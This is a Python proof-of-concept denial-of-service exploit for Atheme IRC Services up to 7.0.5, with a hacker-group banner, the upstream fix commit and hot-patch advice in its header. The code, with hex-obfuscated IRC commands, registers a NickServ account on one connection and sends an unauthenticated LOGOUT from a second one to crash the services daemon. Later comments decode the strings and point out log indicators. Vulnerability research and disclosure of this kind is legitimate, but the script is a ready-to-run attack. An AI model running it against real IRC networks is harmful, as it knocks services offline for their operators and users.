`#!/usr/bin/python3
###################################################################################
# Monday, January 13, 2013
#
#
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
# http://www.zempirians.com
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#
# -=[ Atheme - IRC Services Daemon ] =-
#
# [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
# # T E A M #
# #######################
#
# O_O .....> Sent To Play All Alone <3
# UberLame .....> For Providing More Sweet, Sweet Cycles
# Aph3x .....> For Being Awesome
# Apetrick .....> For Not Letting Me Play With Him
#
###################################################################################
#
# ~~! SHOUT OUTS !~~
#
# a heyoz Eurydemus
# nikka l1nd BinaryTENSHi
# syk Gatsby
#
# ~~! Special Thanks !~~
#
# Packet Storm Security (www.packetstormsecurity.com) for archiving our
# concepts in order to help secure and educate those who read them.
#
###################################################################################
# SUMMARY #
################
#
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194
#
# Improper implementation of the NickServ LOGOUT command results in a segfault of
# the services daemon when an unauthenticated user tries to log out (deauth)
# another, authenticated user.
#
################
# VULNERABLE #
################
#
# Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]
#
################
# CVE #
################
#
# [ No CVE Has Been Reported ]
#
################
# PATCH #
################
#
# - Proper Fix
# - Update To Current Version From GitHub
#
# - Hot Patch
# - Unload nickserv/logout
# > /quote operserv modunload nickserv/logout
# $ !services.global! Module nickserv/logout unloaded.
# $ -OperServ- Module nickserv/logout unloaded.
#
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password>
#
###################################################################################
from argparse import ArgumentParser
import socket
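# Hex-encode a string so it can be spliced into the hex templates passed to
# bytes.fromhex() elsewhere in this file.
def toHex( string_data ):
    """Return *string_data* as lowercase hex, two digits per character.

    Each character is converted through its code point. The previous
    implementation stripped the ``0x`` prefix from ``hex()`` output, which
    yields a single digit for code points below 0x10 and therefore an
    odd-length string that ``bytes.fromhex()`` rejects or mis-decodes.
    Zero-padding to two digits keeps the output identical for every code
    point in 0x10-0xff and makes the low range well-formed.

    Code points above 0xff still produce more than two digits, exactly as
    before; callers are expected to pass single-byte text.
    """
    return ''.join( format( ord( ch ), '02x' ) for ch in string_data )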
def deploy( sock, target, port, nick, passwd ):
    """Second connection of the PoC: send NickServ LOGOUT without identifying.

    Connects *sock* to ``target:port``, registers with the IRC server under a
    fixed nickname, waits for numeric 396 and then sends one NickServ LOGOUT
    line naming *nick* and *passwd*. This connection never sends IDENTIFY, so
    it is the "unauthenticated user" described in the file header; per that
    header, affected Atheme builds segfault while handling the request.

    Args:
        sock: An unconnected TCP socket created by the caller.
        target: Host name or address of the IRC server.
        port: TCP port; converted with ``int()`` before connecting.
        nick: Account name placed in the LOGOUT line.
        passwd: Password placed in the LOGOUT line.

    Returns:
        None (the result of ``sock.close()``).

    Defensive reading: the fixed nickname/user/realname below are stable
    strings to search for in ircd and services logs, and the header's
    mitigations apply (update past the referenced fix commit, or unload
    nickserv/logout).
    """
    try:
        sock.connect(( target, int( port ) ))
    except:
        # Bare except: any failure (DNS, refusal, bad port value) ends the script.
        print( "\t[-] Payload Deployment Failed!" )
        exit()
    # Hex-escaped bytes decode to: "NICK _zemp0day_\r\n"
    sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
    # Decodes to: "USER zemp0day HEHE HEHE :ohai <3\r\n"
    sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
               b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
               b'\x0d\x0a' )
    while True:
        # str() of a bytes object yields its repr ("b'...'"); the substring
        # test below still matches inside that repr.
        host_data = str( sock.recv(4096).strip() )
        # Numeric 396 is used as the "registration finished" marker
        # (presumably the hidden-host reply; depends on the ircd in use).
        # There is no timeout or EOF handling: the loop runs until it appears.
        if ' 396 ' in host_data:
            # Template decodes to: "PRIVMSG NICKSERV :LOGOUT <nick> <passwd>\r\n"
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
                toHex( nick ), toHex( passwd ) ) ) )
            print( '\t[+] Payload Deployed! <3' )
            break
    # Decodes to: "QUIT\r\n"
    sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
    return sock.close()
def stage( target, port, nick, passwd ):
    """First connection of the PoC: create and identify to a NickServ account.

    Connects to ``target:port`` as *nick*, waits for numeric 396, registers
    the nickname with NickServ using *passwd* and a hard-coded e-mail address,
    identifies to it, and then calls ``deploy()`` with a second, still
    unconnected socket so the LOGOUT request arrives from a different,
    unauthenticated client while this one stays logged in.

    Args:
        target: Host name or address of the IRC server.
        port: TCP port; converted with ``int()`` before connecting.
        nick: Nickname to connect with and register.
        passwd: Password used for REGISTER and IDENTIFY.

    Returns:
        None.

    Defensive reading: the USER line and the registration e-mail are fixed
    strings, so default runs of this script leave recognisable entries in
    ircd and services logs.
    """
    sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    # Second socket is only created here; deploy() performs its connect.
    p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    try:
        sock.connect(( target, int( port ) ))
    except:
        # Bare except: any connection problem ends the script.
        print( "[-] Failed To Connect To {}".format( target ) )
        exit()
    # Template decodes to: "NICK <nick>\r\n"
    sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
    # Decodes to: "USER zemp0day HEHE HEHE :ohai <3\r\n"
    sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
               b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
               b'\x3c\x33\x0d\x0a' )
    while True:
        # str() of bytes gives the repr ("b'...'"); substring checks still work.
        host_data = str( sock.recv( 8096 ).strip() )
        # Numeric 396 is treated as the signal that registration with the ircd
        # has completed (presumably the hidden-host reply; ircd-dependent).
        if ' 396 ' in host_data:
            # Decodes to: "PRIVMSG NICKSERV :REGISTER <passwd> devs@zempirians.com\r\n\r\n"
            # .format() binds to the second literal only; the first has no
            # placeholders, so the concatenated result is as intended.
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
                '{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )
            # Decodes to: "PRIVMSG NICKSERV :IDENTIFY <passwd>\r\n"
            sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )
            print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
            # This connection stays open and identified while deploy() runs.
            deploy( p_sock, target, port, nick, passwd )
            break
        # Intended PING keep-alive handling. As written it is effectively a
        # no-op, and any error raised inside it is swallowed by the bare except.
        try:
            msg = host_data.split()
            if msg[0].lower() is 'ping':
                sock.send( b"PONG {}\r\n".format( msg[1] ) )
        except:
            pass
    # Decodes to: "QUIT\r\n"
    sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
    sock.close()
if __name__ == '__main__':
    # Command-line entry point: collect the server, port, nickname and
    # password, then hand them to stage(). Without a target the help text is
    # printed and the script exits.
    cli = ArgumentParser( description='#legion Atheme IRC Services DoS' )
    option_specs = (
        ( ( '-t', '--target' ), dict( dest='target', help='IRCD Server To Connect On' ) ),
        ( ( '-P', '--port' ), dict( dest='port', default=6667, help='Port To Connect On' ) ),
        ( ( '-n', '--nick' ), dict( dest='nick', default='zemp0day', help='Nick To Use' ) ),
        ( ( '-p', '--pass' ), dict( dest='passwd', default='yad0pmez', help='Password To Use' ) ),
    )
    for flags, settings in option_specs:
        cli.add_argument( *flags, **settings )
    opts = cli.parse_args()
    if opts.target is not None:
        # The port stays a str when given on the command line; the callee
        # converts it with int() before connecting.
        stage( opts.target, opts.port, opts.nick, opts.passwd )
    else:
        cli.print_help()
        exit()
`